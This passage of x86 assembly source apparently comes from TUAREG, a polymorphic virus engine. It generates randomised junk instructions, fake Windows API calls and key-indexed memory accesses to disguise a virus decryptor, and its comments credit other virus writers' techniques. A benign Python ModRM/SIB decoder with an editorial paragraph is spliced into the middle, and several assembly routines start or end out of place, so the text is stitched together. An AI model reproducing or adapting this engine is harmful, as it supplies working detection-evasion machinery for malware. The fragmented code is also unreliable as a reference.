; DEBUG and build such instructions :)
stosw ; Store the opcode
jmp @@Return ; Return
;; Here we make a memory operation. It can be a read or a write, and it can
;; be indexed with the Key register, since that is the only register that
;; doesn't change its value (at least in this version of TUAREG).
;; We have to be sure that the memory addresses used exist (even for reads):
;; this is protected mode with 32-bit addresses, unlike DOS where reading from
;; anywhere was harmless.
@@MemoryOperation:
call RandomFlags
setz al ; Get a random AX being 0000h, 0001h, 0100h or
sets ah ; 0101h, to set @@MemoryRead and @@Memo32bits
mov word ptr [ebp+@@MemoryRead], ax ; with random 0 or 1
; and use them to construct the garbage instruction
call SelectAnAddressLow ; Get a random read/writing address
; in EBX
call RandomFlags ; Randomly, select the type of instruction
jz @@MW_WithReg ; If ZF, make a read/write with a reg
;; Make: OP [Memory_Address],Value
@@MW_WithValue:
call Random
and ah, 38h ; Get a random operation
cmp ah, 38h ; CMP?
jz @@MW_WV_MOV ; Then, do MOV
mov al, 80h ; Set main opcode
jmp @@MW_Continue01 ; Jump
@@MW_WV_MOV: mov ax, 00C6h ; C6 = Opcode of MOV
@@MW_Continue01:
call RandomFlags ; Indexed?
jz @@MW_WV_NotIndexed
js @@MW_WV_NotIndexed
jc @@MW_WV_Indexed
jp @@MW_WV_NotIndexed
; Select indexed with a (12.5%+6.25%) of probability
;; This is the indexed one. We can do OP Reg,[Reg2+Value] (or the reverse)
@@MW_WV_Indexed:
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@MW_WV_NotIndexed ; If it isn't set yet, then make a
; not indexed operation
call RandomFlags
jz @@MW_WV_NotThird
js @@MW_WV_NotThird
or ah, 04h ; Activate third opcode
call RandomFlags
pushf
jz @@MW_WV_Mult_32b
js @@MW_WV_Mult_8b
@@MW_WV_Mult_32b:
inc eax
@@MW_WV_Mult_8b:
stosw
@@MW_WV_RepeatMult:
call Random
and al, 3
jz @@MW_WV_RepeatMult
mov cl, al
mov al, byte ptr [ebp+KeyRegister]
shl al, 3
or al, 5
mov edx, [ebp+DecryptKey]
shl edx, cl
ror cl, 2
or al, cl
stosb
sub ebx, edx
jmp @@MW_WVGb
@@MW_WV_NotThird:
or ah, 80h ; Mask the opcode for dword addition
or ah, byte ptr [ebp+KeyRegister] ; Set the key register
sub ebx, [ebp+DecryptKey] ; Subtract the value of the
; key register to the memory address
jmp @@MW_WV_01 ; Jump to complete the instruction
;; Here we make not indexed operations
@@MW_WV_NotIndexed:
add ah, 5 ; Direct value inside the brackets
@@MW_WV_01:
call RandomFlags
pushf
jz @@MW_WV32b
js @@MW_WV8b ; Select 8 or 32 bits
;; Here we use a random register instead of a value. This time we can make
;; reads or writes (with a value we can only do writes). If we write to memory,
;; we can use any of the seven general purpose registers. If it's a read, only
;; a non-reserved one.
@@MW_WithReg:
cmp byte ptr [ebp+@@MemoryRead], 1 ; Read or write?
jnz @@MW_WR_80 ; Jump if write
cmp byte ptr [ebp+@@Memo32bits], 1 ; 8 or 32 bits?
jz @@MW_WR_79 ; Jump if 32 bits
;; Here we make OP Reg8,[(Reg+)Value]
call SelectAReg8 ; Select a 8 bits register
cmp al, 8 ; Can we select anyone?
jz @@MemoryOperation ; If not, select another type of op.
jmp @@MW_WR_81 ; Jump and continue
;; Here we make OP Reg32,[(Reg+)Value]
@@MW_WR_79: call SelectARegister ; Select a not-reserved register
jmp @@MW_WR_81 ; Jump and continue
;; Here we make OP [(Reg+)Value],Reg8/32
@@MW_WR_80: call SelectAnyRegisterWithInit ; Select any register, and
; initialize it to a random value if it isn't
; set with a value
@@MW_WR_81: mov dl, al ; Save the register in DL
call Random ; Get an operation
and al, 38h
call RandomFlags ; Select indexed or not
jz @@MW_WR_NotIndexed
js @@MW_WR_NotIndexed
jc @@MW_WR_Indexed
jp @@MW_WR_NotIndexed
;; Here we index with the Key register
@@MW_WR_Indexed:
cmp byte ptr [ebp+KeyIsInit], 1 ; If the key register
jnz @@MW_WR_NotIndexed ; isn't set with its value, then
; we can't do this, so make a not
; indexed memory operation
call RandomFlags
jz @@MW_WR_NotThird
js @@MW_WR_NotThird
cmp al, 38h ; CMP?
jnz @@MW_WR_99 ; If not, jump
mov al, 88h ; If CMP, substitute it by MOV
@@MW_WR_99:
mov ah, 4h
shl dl, 3
or ah, dl
mov cl, byte ptr [ebp+@@Memo32bits]
add al, cl
mov cl, byte ptr [ebp+@@MemoryRead]
add al, cl
add al, cl
stosw
@@MW_WR_RepeatMult:
call Random
and eax, 3
jz @@MW_WR_RepeatMult
mov ecx, eax
mov eax, 1
shl eax, cl
@@MW_WR_Subtract:
sub ebx, [ebp+DecryptKey]
dec eax
jnz @@MW_WR_Subtract
mov al, [ebp+KeyRegister]
shl al, 3
or al, 5
ror cl, 2
or al, cl
stosb
jmp @@MW_WR_02
@@MW_WR_NotThird:
mov ah, 80h ; Mask with dword addition
or ah, byte ptr [ebp+KeyRegister] ; Put the indexation
; register in the opc.
sub ebx, [ebp+DecryptKey] ; Calculate the addition
shl dl, 3
or ah, dl ; Set the destiny register
cmp al, 38h ; CMP?
jnz @@MW_WR_01 ; If not, jump
mov al, 88h ; If CMP, substitute it by MOV
jmp @@MW_WR_01 ; Jump to continue
;; Here with no indexing (direct memory address)
@@MW_WR_NotIndexed:
mov ah, 05h ; Direct value inside brackets
@@MW_WR_Cont01:
shl dl, 3
or ah, dl ; Set the destiny register
cmp al, 38h ; CMP?
jnz @@MW_WR_01 ; If not, avoid
@@MW_WR_MOV:
or dl, dl ; EAX?
jz @@MW_WR_EAX ; Then, use its own opcode for MOV
mov al, 88h ; Substitute CMP by MOV
jmp @@MW_WR_01 ; Jump and continue
@@MW_WR_EAX:
mov al, 0A2h ; AL=Opcode of MOV [Value],AL. From this
; opcode we get the variants
call RandomFlags ; Select 8 or 32 bits
jz @@MW_WR_EAX3 ; Jump if 8 bits
@@MW_WR_EAX2:
inc eax ; Increase opcode to make MOV [Value],EAX
@@MW_WR_EAX3:
cmp byte ptr [ebp+@@MemoryRead], 1 ; Memory read?
jnz @@MW_WR_82 ; If not, jump and continue
sub al, 2 ; Make it a READ by subtracting 2 from the opcode.
; Then we get MOV AL/EAX,[Value]
@@MW_WR_82:
stosb ; Store the opcode
jmp @@MW_WR_02 ; Jump to insert the memory address
; Not EAX in the register
@@MW_WR_01:
cmp byte ptr [ebp+@@MemoryRead], 1 ; Memory read?
jnz @@ContinueMW ; If not, continue
cmp byte ptr [ebp+@@Memo32bits], 1 ; 32 bits?
jz @@MW_WR_32b ; If 32 bits, jump
jmp @@MW_WR_8b ; Avoid opcode increment
; Here to memory write
@@ContinueMW: call RandomFlags ; Decide: 8 or 32 bits?
jz @@MW_WR_8b ; If 8, jump
@@MW_WR_32b:
inc eax ; Convert opcode to 32 bits operation from a
@@MW_WR_8b: ; a 8 bits opcode
cmp byte ptr [ebp+@@MemoryRead], 1 ; Read or write?
jnz @@MW_WR_83 ; If write, jump
add al, 2 ; Convert write opcode to read opcode
@@MW_WR_83:
stosw ; Store the opcode
@@MW_WR_02:
mov eax, ebx
stosd ; Store the memory address (or calculated addition)
jmp @@Return ; Jump to return
mov ah, al
add ah, 10h ; Convert the 8 bits opcode to the 32
mov al, 0Fh ; bits one
stosw ; Store it
xchg esi, eax
stosd ; Store the displacement
jmp @@RL_Next06 ; Jump and continue
@@RL_Next05: stosb ; Store the 8 bits opcode
xchg esi, eax
stosb ; Store the displacement
@@RL_Next06: call DoRandomGarbage
mov al, [ebp+@@SelectedRegister]
add al, 58h ; Store POP with the used register
stosb
mov byte ptr [ebp+ImInRandomLoop], 0
jmp @@Return
@@NormalCALL:
cmp dword ptr [ebp+CallsLevel1Ndx], 20h*4
jz @@Make1 ; If we can't do more level 1 calls, do other
; type of garbage
cmp dword ptr [ebp+CallsLevel2Ndx], 20h*4
jz @@Make1 ; If we can't do more level 2 calls, do other
; type of garbage
cmp dword ptr [ebp+CallsLevel3Ndx], 20h*4
jz @@Make1 ; If we can't do more level 3 calls, do other
; type of garbage
cmp byte ptr [ebp+KeyIsInit], 1 ; Is the key register set?
jnz @@Make1 ; If it isn't, then avoid CALLs.
; Explanation: we emit the CALL first and code the
; subroutine itself much later. That subroutine may
; contain indexed memory accesses, which need the Key
; register to hold its correct value. If the key isn't
; set yet when the CALL is reached, the subroutine
; would index with the Key register while it still
; holds an unknown value.
call RandomFlags ; Stack entries?
jz @@NoStack
js @@NoStack
; Put stack entries with 25% probability
mov byte ptr [ebp+@@WithStack], 1 ; Mark it
call Random
and eax, 3
inc eax ; Get a number between 1 and 4
mov byte ptr [ebp+@@StackEntries], al ; Save this number
mov ecx, eax ; ECX=that number
@@LoopInsertEntries:
mov al, 68h ; Opcode of PUSH Value
stosb ; Store it
@@AnotherValueTypeForStack:
call Random ; Get a random type of value to push
and al, 3
jz @@PushRegister ; AL=0? Then push a register
cmp al, 2
jb @@PushAddress ; AL=1? Then push a memory address
jz @@PushPureRandom ; AL=2? Then push a random dword
@@PushPseudoFlags: ; AL=3? Then push a random < 10000h
call Random ; (like flags)
and eax, 0FFFFh
jmp @@NextStackEntry ; Store value
@@PushAddress:
call SelectAnAddressLow ; Get an address
mov eax, ebx ; Put it into EAX and jump to store it
jmp @@NextStackEntry ; Jump to store it
@@PushRegister:
call SelectAnyRegisterWithInit
dec edi
add al, 50h
stosb
jmp @@ContinueStackEntries
@@PushPureRandom:
call Random ; EAX=Random value
@@NextStackEntry:
cmp eax, 7Fh
jbe @@TwoBytesEntry
cmp eax, 0FFFFFF80h ; Is the value between -80h and 7Fh?
jae @@TwoBytesEntry ; If it is, change the opcode
stosd ; Store the dword
jmp @@ContinueStackEntries ; Jump and continue
@@TwoBytesEntry:
mov byte ptr [edi-1], 6Ah ; Change the opcode by PUSH
stosb ; Packed_Dword_Value and store the value to push
@@ContinueStackEntries:
loop @@LoopInsertEntries ; Loop and make it ECX times
jmp @@ContinueCALL ; Continue the CALL coding
;; Here if we don't use stack
@@NoStack: mov byte ptr [ebp+@@WithStack], 0 ; Set this variable
@@ContinueCALL:
mov al, 0E8h
stosb ; Insert a CALL opcode
movzx ebx, byte ptr [ebp+GarbageRecursivity] ; Get the current
dec ebx ; recursion level (0-based)
mov ecx, ebx
shl ebx, 5 ; *20h
add ebx, ecx ; *21h
shl ebx, 2 ; *84h: each level's index dword plus its 20h
; entries take 84h bytes, so level*84h selects the
; array for this level and one generic sequence
; can store the CALL data whatever the level is
mov ecx, [ebp+ebx+CallsLevel1Ndx] ; Get the insertion
; index
add ecx, ebx ; Add the level*84h
mov dword ptr [ebp+ecx+CallsLevel1], edi ; Store the current
; address into the array for later completion
add dword ptr [ebp+ebx+CallsLevel1Ndx], 4 ; Increase the
; insertion index
add edi, 4 ; Leave space for the CALL displacement and
; complete it later
cmp byte ptr [ebp+@@WithStack], 1 ; Have we used stack?
jnz @@Return ; If not, finish
mov ax, 0C483h ; AX=Opcode of the instruction ADD ESP,xxx
stosw ; Store the opcode
mov al, byte ptr [ebp+@@StackEntries] ; Get the number to
shl al, 2 ; add to ESP to release the stack
stosb ; Store it
jmp @@Return ; Return
@@Return:
@@DontMake: mov [esp+S_EDI], edi ; Preserve EDI across POPAD
dec byte ptr [ebp+GarbageRecursivity] ; Decrease the
; recursion level
popad
ret ; Return to the caller, or just to another running
; instance of Garbage
Garbage endp
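The LEA comment in DoMOVRegReg and the SIB construction in Garbage (KeyRegister shifted into the index field, base field 101, scale rotated into the top two bits) both depend on two ModRM/SIB special cases: rm=101 with mod=00 means [disp32] rather than [EBP], and a SIB base field of 101 with mod=00 means no base register and a trailing disp32. The decoder below is an added example written for this edit in Python; it is not code from TUAREG or its author. It decodes exactly those operand forms so the bytes the engine emits can be checked by hand. The byte strings it decodes are constructed for the demonstration, not taken from any sample, and the function names are this example's own.

```python
"""Decode 32-bit ModRM/SIB memory operands, to check the encoding rules the engine relies on."""
from dataclasses import dataclass
from typing import Optional

MASK32 = 0xFFFFFFFF
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


@dataclass
class Operand:
    reg: str               # register named by the ModRM reg field (the LEA destination)
    base: Optional[str]    # base register, None when the form has no base
    index: Optional[str]   # SIB index register, None when absent
    scale: int             # 1, 2, 4 or 8
    disp: int              # signed displacement, 0 when none is encoded
    length: int            # bytes consumed: ModRM + SIB + displacement


def _read_disp(code: bytes, i: int, mod: int):
    """mod=01 -> disp8, mod=10 -> disp32, mod=00 -> no displacement."""
    if mod == 1:
        return int.from_bytes(code[i:i + 1], "little", signed=True), i + 1
    if mod == 2:
        return int.from_bytes(code[i:i + 4], "little", signed=True), i + 4
    return 0, i


def _read_disp32(code: bytes, i: int):
    return int.from_bytes(code[i:i + 4], "little", signed=True), i + 4


def decode_modrm(code: bytes, pos: int = 0) -> Operand:
    """Decode the ModRM (+SIB, +displacement) starting at code[pos]."""
    modrm = code[pos]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    i = pos + 1
    if mod == 3:
        raise ValueError("mod=11 is register-direct; no memory operand")
    base = index = None
    scale = 1
    if rm == 4:                                  # rm=100: a SIB byte follows (ESP can't be a plain base)
        sib = code[i]
        i += 1
        scale = 1 << (sib >> 6)
        idx, b = (sib >> 3) & 7, sib & 7
        index = None if idx == 4 else REGS32[idx]  # index=100 means "no index"
        if b == 5 and mod == 0:                  # base=101 with mod=00: no base, disp32 follows
            disp, i = _read_disp32(code, i)
        else:
            base = REGS32[b]
            disp, i = _read_disp(code, i, mod)
    elif rm == 5 and mod == 0:                   # rm=101 with mod=00 is [disp32], not [ebp]
        disp, i = _read_disp32(code, i)
    else:
        base = REGS32[rm]
        disp, i = _read_disp(code, i, mod)
    return Operand(REGS32[reg], base, index, scale, disp, i - pos)


def decode_lea(code: bytes) -> Operand:
    """LEA r32, m is opcode 8Dh /r; return the decoded memory operand."""
    if code[0] != 0x8D:
        raise ValueError("not an LEA opcode")
    return decode_modrm(code, 1)


def render(op: Operand) -> str:
    """Intel-syntax text for the memory operand."""
    parts = []
    if op.base:
        parts.append(op.base)
    if op.index:
        parts.append(op.index if op.scale == 1 else f"{op.index}*{op.scale}")
    if not parts:
        return f"[0x{op.disp & MASK32:08X}]"
    text = "+".join(parts)
    if op.disp > 0:
        text += f"+0x{op.disp:X}"
    elif op.disp < 0:
        text += f"-0x{-op.disp:X}"
    return f"[{text}]"


if __name__ == "__main__":
    # Constructed byte sequences in the forms the engine emits (not taken from a sample).
    for code in (bytes.fromhex("8D4500"),           # LEA EAX,[EBP]: EBP needs mod=01 and a zero disp8
                 bytes.fromhex("8D0578563412"),     # mod=00 rm=101: [disp32], no base register
                 bytes.fromhex("8D0C9D00FFFFFF")):  # SIB base=101, mod=00: [EBX*4+disp32]
        op = decode_lea(code)
        print(code.hex(), "lea", op.reg + ",", render(op))
```

Running it shows why the engine must spend a displacement byte on EBP (8D 45 00 is the shortest LEA with EBP as base) and why its Key-indexed forms always carry a 32-bit displacement when no base register is used.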
call RandomFlags
jz @@MoveToRegForCALL
@@DirectCALLToMem:
call DoMOVMemValue
call DoRandomGarbage
call RandomFlags
jz @@DC_00
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@DC_00
push ebx
mov ax, 10FFh
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@DC_01
cmp ebx, 0FFFFFF80h
jae @@DC_01
or ah, 80h
or ah, [ebp+KeyRegister]
stosw
mov eax, ebx
stosd
jmp @@DC_02
@@DC_01: or ah, 40h
or ah, [ebp+KeyRegister]
stosw
mov al, bl
stosb
@@DC_02: pop ebx
@@DC_03: call ReleaseVar
jmp @@Return
@@DC_00: mov ax, 15FFh
stosw
mov eax, ebx
stosd
jmp @@DC_03
@@MoveToRegForCALL:
mov ecx, eax
call RandomFlags
jz @@DirectValueForCALL
call Random
sub ebx, eax
mov byte ptr [ebp+@@PureValue], 0
mov dword ptr [ebp+@@ValueToAdd], eax
jmp @@DVFC_001
@@DirectValueForCALL:
mov byte ptr [ebp+@@PureValue], 1
mov dword ptr [ebp+@@ValueToAdd], 0
@@DVFC_001: call Random
and eax, 3
cmp eax, 2
jz @@DVFC_001
mov dl, [ebp+eax+Index1Register]
cmp dl, 8
jnz @@DVFC_001_
mov dl, [ebp+Index1Register]
@@DVFC_001_: call RandomFlags
jz @@FirstMovReg
@@FirstMovMem:
call RandomFlags
jz @@FMM_PushFirst
mov eax, ecx
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
push ebx
add ebx, [ebp+@@ValueToAdd]
call DoMOVMemValue
pop ebx
call DoRandomGarbage
call DoPUSHReg
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
@@FMM_001: push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoRandomGarbage
mov eax, ebx
call DoMOV
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
jmp @@InsertCALL
@@FMM_PushFirst:
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoPUSHReg
call DoRandomGarbage
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
mov eax, ecx
push ebx
add ebx, [ebp+@@ValueToAdd]
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoMOVMemValue
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
pop ebx
jmp @@FMM_001
@@FirstMovReg:
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoPUSHReg
call DoRandomGarbage
mov eax, ebx
call DoMOV
call DoRandomGarbage
mov eax, ecx
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
push ebx
add ebx, [ebp+@@ValueToAdd]
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoMOVMemValue
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
pop ebx
@@InsertCALL:
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoRandomGarbage
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
mov ax, 10FFh
or ah, dl
cmp byte ptr [ebp+@@PureValue], 1
jz @@WithoutAddition
@@WithAddition:
cmp dword ptr [ebp+@@ValueToAdd], 7Fh
jbe @@WA_byte
cmp dword ptr [ebp+@@ValueToAdd], 0FFFFFF80h
jae @@WA_byte
or ah, 80h
stosw
mov eax, [ebp+@@ValueToAdd]
stosd
jmp @@OK2
@@WA_byte: or ah, 40h
stosw
mov eax, [ebp+@@ValueToAdd]
stosb
jmp @@OK2
@@WithoutAddition:
cmp dl, 5
jz @@WithAddition
@@OK: stosw
@@OK2: call DoRandomGarbage
call DoPOPReg
call ReleaseVar
; jmp @@Return
MakeCALLTo endp
ReserveReg proc
pushad
@@OtherRandom:
call Random
and eax, 3
cmp eax, 2
jz @@OtherRandom
mov dl, [ebp+eax+Index1Register]
cmp dl, 8
jnz @@AnyReg
mov dl, [ebp+Index1Register]
@@AnyReg: call DoPUSHReg
@@Return: mov [esp+S_EDX], edx
mov [esp+S_EDI], edi
popad
ret
ReserveReg endp
ReleaseReg proc
pushad
call DoPOPReg
@@Return: mov [esp+S_EDI], edi
popad
ret
ReleaseReg endp
SelectAnAddressLow proc
mov byte ptr [ebp+SelectLowAddress], 1
jmp SelectAnAddress
SelectAnAddressLow endp
SelectAnAddressHigh proc
mov byte ptr [ebp+SelectLowAddress], 0
jmp SelectAnAddress
SelectAnAddressHigh endp
SelectLowAddress db 0
;; This function gets a random register (random number between 0 and 7) and
;; keeps drawing until the number doesn't coincide with any reserved register
;; identifier, nor with ESP, nor with the one selected in the last call to this
;; function or a similar one.
SelectARegister proc
call Random
and al, 7 ; Random between 0 and 7
cmp al, 4 ; ESP?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+Index1Register] ; Equal to Index1?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+Index2Register] ; Equal to Index2?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+KeyRegister] ; Equal to Key?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+BufferRegister] ; Equal to Buffer?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+RegisterSelectedB4] ; If it's equal
jz SelectARegister ; to the last selected one, repeat
mov byte ptr [ebp+RegisterSelectedB4], al ; Save as the
ret ; last selected, and return
SelectARegister endp
;; This function does the same as the one above but with an 8-bit register, so
;; it can only select E?X registers. Since there are four reserved registers and
;; only four registers with 8-bit halves (E?X), they may all be reserved, so we
;; check that first and return the value 8 if no 8-bit register can be selected.
;; We also initialize the register if the selected one hasn't been "touched"
;; before, since 8-bit registers are only used to make garbage.
SelectAReg8 proc
cmp byte ptr [ebp+Index1Register], 3 ; E?X?
ja @@NoProblemo ; If not, continue
cmp byte ptr [ebp+Index2Register], 3 ; E?X?
ja @@NoProblemo ; If not, continue
cmp byte ptr [ebp+KeyRegister], 3 ; E?X?
ja @@NoProblemo ; If not, continue
cmp byte ptr [ebp+BufferRegister], 3 ; E?X?
ja @@NoProblemo ; If not, continue
mov al, 8 ; All reserved registers are E?X, so we can't
ret ; continue
@@NoProblemo:
call Random
and al, 3 ; Get an E?X register
cmp al, byte ptr [ebp+Index1Register] ; Is it reserved?
jz @@NoProblemo ; If so, pick another
cmp al, byte ptr [ebp+Index2Register] ; Is it reserved?
jz @@NoProblemo ; If so, pick another
cmp al, byte ptr [ebp+KeyRegister] ; Is it reserved?
jz @@NoProblemo ; If so, pick another
cmp al, byte ptr [ebp+BufferRegister] ; Is it reserved?
jz @@NoProblemo ; If so, pick another
push eax
and eax, 0FFh ; Look if the register is "touched"
cmp byte ptr [ebp+eax+TouchedRegisters], 1
jz @@OK ; If it is, jump and continue
push edx ; Save registers
mov dl, al ; DL=Selected 32 bits register
call Random ; Set a random value
call DoMOV ; Make a MOV (or similar) with the reg and the
pop edx ; value, and restore the registers from stack
@@OK: pop eax
and ah, 4
or al, ah ; Select random ?L or ?H
ret ; Return
SelectAReg8 endp
call RandomFlags
jz @@WithAddition
@@WithoutAddition:
mov ax, 15FFh ;; CALL DWORD PTR [xxx]
stosw
mov eax, [ebp+esi+APIInfo+04h]
stosd
jmp @@Continue
@@WithAddition:
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@WithoutAddition
mov ax, 10FFh
or ah, [ebp+KeyRegister]
mov ecx, [ebp+esi+APIInfo+04]
sub ecx, [ebp+DecryptKey]
cmp ecx, 7Fh
jbe @@AddByte
cmp ecx, 0FFFFFF80h
jae @@AddByte
or ah, 80h
stosw
mov eax, ecx
stosd
jmp @@Continue
@@AddByte:
or ah, 40h
stosw
mov eax, ecx
stosb
@@Continue:
mov al, byte ptr [ebp+esi+APIInfo+0Bh]
or al, al
jz @@Check0
cmp al, 2
jb @@CheckMinus1
ja @@NoCheck
@@CheckBoolean:
call RandomFlags
jz @@Check0
mov al, 3Dh
stosb
mov eax, 1
stosd
jmp @@MakeCondJump
@@Check0: call Random
and al, 3
jz @@Check0
cmp al, 2
jb @@OR
jz @@AND
@@TEST: mov ax, 0C085h
stosw
jmp @@MakeCondJump
@@OR: mov ax, 0C009h
stosw
jmp @@MakeCondJump
@@AND: mov ax, 0C021h
stosw
jmp @@MakeCondJump
@@CheckMinus1:
mov al, 3Dh
stosb
mov eax, -1
stosd
@@MakeCondJump:
@@CJ_Again:
call RandomFlags
jz @@MakeJZ
mov al, 75h ; JNZ
jmp @@MakeJump
@@MakeJZ: mov al, 74h ; JZ
@@MakeJump: stosb
inc edi ; Leave space for the displacement
@@CJ_Again3:
push dword ptr [ebp+CallsLevel1Ndx] ; Save the indexes of
push dword ptr [ebp+CallsLevel2Ndx] ; the calls. If we have
push dword ptr [ebp+CallsLevel3Ndx] ; to repeat the garbage
; because it's too long, we must restore them so
; that no displacement of a discarded CALL gets
; written later over code that isn't a CALL
@@CJ_Again2:
mov esi, edi ; Save the actual storage index
call DoRandomGarbage ; Make garbage
sub esi, edi ; Get the (-)displacement of the jump
jz @@CJ_Again2 ; If it's zero, loop to make garbage
neg esi ; Calculate true displacement
cmp esi, 7Fh ; Does it exceed the limit of a disp8?
jbe @@CJ_OK ; If not, jump and continue
pop dword ptr [ebp+CallsLevel3Ndx] ; Restore this, elimi-
pop dword ptr [ebp+CallsLevel2Ndx] ; nating any created
pop dword ptr [ebp+CallsLevel1Ndx] ; call before
sub edi, esi ; Restore EDI...
jmp @@CJ_Again3 ; ...and repeat the garbage generation
; Here if the size of the garbage is correct
@@CJ_OK: pop eax ; Release the data in stack
pop eax
pop eax
mov eax, esi ; Put the displacement in AL
neg esi ; Calculate the distance until the opcode
mov byte ptr [edi+esi-1], al ; Set the displacement in
; the opcode
@@NoCheck:
call APICall_RestoreStack
APICall_StackOrder db 0
APICall_StackedRegs db 0, 0, 0
ImInAPI db 0
AnyAPIFound db 0
FirstAPICall db 0
APICall_SaveEAX proc
pushad
xor dl, dl
jmp APICall_SaveReg_Common
APICall_SaveEAX endp
APICall_SaveECX proc
pushad
mov dl, 1
jmp APICall_SaveReg_Common
APICall_SaveECX endp
APICall_SaveEDX proc
pushad
mov dl, 2
APICall_SaveReg_Common:
cmp byte ptr [ebp+Index1Register], dl
jz @@SaveReg
cmp byte ptr [ebp+Index2Register], dl
jz @@SaveReg
cmp byte ptr [ebp+BufferRegister], dl
jnz @@NoRegister
@@SaveReg:
movzx eax, byte ptr [ebp+APICall_StackOrder]
mov [ebp+eax+APICall_StackedRegs], dl
inc eax
mov [ebp+APICall_StackOrder], al
call DoPUSHReg
@@NoRegister:
call DoRandomGarbage
mov [esp+S_EDI], edi
popad
ret
APICall_SaveEDX endp
PushParameter proc
pushad
cmp al, 1
jb @@End
jz @@Random
cmp al, 3
jb @@Handle
jz @@Buffer
cmp al, 5
jb @@BufferSize
jz @@Byte
cmp al, 7
jb @@Flags
jz @@Null
cmp al, 9
jb @@VirtualPointer
@@VirtualSize:
mov al, 6Ah
stosb
call Random
and eax, 0Fh
add eax, 10h
stosb
jmp @@End
@@VirtualPointer:
mov al, 68h
stosb
call Random
and eax, 3FE0h
add eax, [ebp+EncryptedDataBeginAddress]
stosd
jmp @@End
@@Random: call Random
cmp eax, 7Fh
jbe @@RandomByte
cmp eax, 0FFFFFF80h
jae @@RandomByte
push eax
mov al, 68h
stosb
pop eax
stosd
jmp @@End
@@RandomByte:
push eax
mov al, 6Ah
stosb
pop eax
stosb
jmp @@End
@@Handle:
mov al, 68h
stosb
xor edx, edx
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 07h
or eax, edx
stosd
jmp @@End
@@Buffer: call SelectAnAddressHigh
mov al, 68h
stosb
mov eax, ebx
stosd
jmp @@End
@@BufferSize:
mov al, 6Ah
stosb
call Random
and al, 1Fh
or al, 20h
and ah, 4
add al, ah
stosb
jmp @@End
@@Byte: mov al, 68h
stosb
call Random
and eax, 0FFh
cmp eax, 7Fh
jbe @@ByteByte
stosd
jmp @@End
@@ByteByte:
mov byte ptr [edi-1], 6Ah
stosb
jmp @@End
@@Null: mov ax, 006Ah
stosw
jmp @@End
@@Flags: xor edx, edx
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
mov al, 68h
stosb
mov eax, edx
stosd
@@End: mov [esp+S_EDI], edi
popad
ret
PushParameter endp
APICall_RestoreStack proc
pushad
movzx eax, [ebp+APICall_StackOrder]
or eax, eax
jz @@End
@@Loop01: dec eax
js @@End
mov dl, [ebp+eax+APICall_StackedRegs]
push eax
call DoPOPReg
call DoRandomGarbage
pop eax
jmp @@Loop01
@@End: mov [esp+S_EDI], edi
popad
ret
APICall_RestoreStack endp
;; API information
;; Each API entry has the following format:
;;
;; +00: Checksum of API name (DWORD)
;; +04: Virtual address it will have in the file, 0 if not available/imported
;; +08-09-0A: Parameters in standard order (in reverse-PUSHing order):
;; 0=No parameter (last one)
;; 1=Random number
;; 2=Pseudo-handle
;; 3=Buffer address (beware with frame)
;; 4=Buffer size
;; 5=Number between 0 and 255
;; 6=Pseudo-flags
;; 7=NULL
;; 8=Any virtual address (for IsBad* funcs)
;; 9=Virtual size (for IsBad* funcs)
;; +0B: byte: Value returning check: 0=0, 1=-1, 2=Boolean, 3=Void or random
;; (no check)
;; +0C: Reserved
;;
;; One of the most used functions in the engine. I think the idea is Vecna's,
;; from one of his viruses. You get a random number and load it into the flags,
;; so you have random flags to use with conditional jumps, getting the same
;; effect as CALL Random/AND AL,1/JZ xxx but shorter and with more flags to
;; branch on. SAHF only loads the status flags a CMP can modify (SF, ZF, AF,
;; PF and CF) from AH, so others like IF or TF (the important ones) are not
;; touched.
RandomFlags proc
push eax ; Save EAX
call Random ; Get a random number in AH
sahf ; Load it in the flags register
pop eax ; Restore EAX
ret ; Return
RandomFlags endp
;; The random generator. I have used this routine since MeDriPolEn, where it
;; had a 48-bit seed and generated a near-perfect random sequence. Now it's
;; converted to 32 bits, so it has a 96-bit seed (!!! - outstanding!).
Random proc
push ecx ; Save register
mov eax, [ebp+DwordAleatorio1] ; Get 1st seed
dec dword ptr [ebp+DwordAleatorio1] ; Decrease to avoid linearity
xor eax, [ebp+DwordAleatorio2] ; XOR with 2nd seed
mov ecx, eax ; Result in CL
rol dword ptr [ebp+DwordAleatorio1], cl ; ROL the 1st seed CL
; times (random)
add [ebp+DwordAleatorio1], eax ; Add (1st XOR 2nd) to 1st
adc eax, [ebp+DwordAleatorio2] ; Add the 2nd seed to (1st XOR 2nd)
; with CF (random CF at the moment)
